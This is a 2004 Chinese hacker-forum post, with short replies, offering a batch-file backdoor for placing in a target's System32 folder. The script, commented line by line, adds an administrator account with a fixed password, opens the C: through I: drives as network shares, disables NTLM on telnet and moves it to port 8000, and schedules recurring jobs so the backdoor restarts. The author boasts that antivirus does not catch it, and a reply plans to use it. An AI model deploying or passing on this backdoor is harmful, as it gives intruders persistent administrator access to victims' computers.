论坛: 菜鸟乐园 标题: 一个批处理后门推荐大家使用! 复制本贴地址    
作者: lhh2003 [lhh2003]    论坛用户   登录
这个后门唯一的好处就是不会被查杀,还有就是小巧,放到对方SYSTEM32目录下就可以了,代码如下:(`后面是我的解释,用的时候可以去掉)
@echo off `关闭回显
@net user skyapex hacker /add `加一个用户为skyapex,密码为hacker的用户
@net localgroup administrators skyapex /add `加入管理员组
@net share c$=c: `以下是共享c.d.e.f.g.h.i盘
@net share d$=d:
@net share e$=e:
@net share f$=f:
@net share g$=g:
@net share h$=h:
@net share i$=i:
@echo 3 > c:\WINNT\SYSTEM32\tl.txt `在SYSTEM32目录下生成一个文件,为去掉NTLM验证做准备:)
@echo 8 >> c:\WINNT\SYSTEM32\tl.txt
@echo y >> c:\WINNT\SYSTEM32\tl.txt
@echo 8000 >> c:\WINNT\SYSTEM32\tl.txt
@echo y >> c:\WINNT\SYSTEM32\tl.txt
@echo 7 >> c:\WINNT\SYSTEM32\tl.txt
@echo y >> c:\WINNT\SYSTEM32\tl.txt
@echo 0 >> c:\WINNT\SYSTEM32\tl.txt
@echo y >> c:\WINNT\SYSTEM32\tl.txt
@echo 0 >> c:\WINNT\SYSTEM32\tl.txt
@echo 5 >> c:\WINNT\SYSTEM32\tl.txt
@echo 4 >> c:\WINNT\SYSTEM32\tl.txt
@echo 0 >> c:\WINNT\SYSTEM32\tl.txt
@tlntadmn < c:\WINNT\SYSTEM32\tl.txt `重定向改掉NTLM验证
@echo at 11:00 c:\WINNT\SYSTEM32\log.bat > c:\WINNT\SYSTEM32\1.bat `生成一个文件,计划在11:00运行log.bat
@echo at 23:00 c:\WINNT\SYSTEM32\log.bat >> c:\WINNT\SYSTEM32\1.bat `计划在23:00运行log.bat
@at 11:05 c:\WINNT\SYSTEM32\1.bat `计划11:05运行1.bat
@at 23:05 c:\WINNT\SYSTEM32\1.bat `计划23:05运行1.bat
@net stop telnet `停止telnet服务
@net start telnet `开始telnet服务
@exit `退出
这样就回循环运行我们的程序了,即使被人停下来,过几个小时,又回重新运行,呵呵。
运行后TELNET到目标的8000断口上去,用户名为skyapex,密码为hacker。


地主 发表时间: 04-02-12 20:01

回复: wangsong [wangsong]   论坛用户   登录
不错呀!很好

B1层 发表时间: 04-02-15 09:58

回复: k_com [k_com]   论坛用户   登录
看起来很好~~有机会用的了

B2层 发表时间: 04-02-15 10:18

回复: hudou [hudou]   论坛用户   登录
不错是不错,但很容易被发现呀他当网管是白痴呀一看AT就知道了

B3层 发表时间: 04-02-15 15:38

论坛: 菜鸟乐园

20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon

粤ICP备05087286号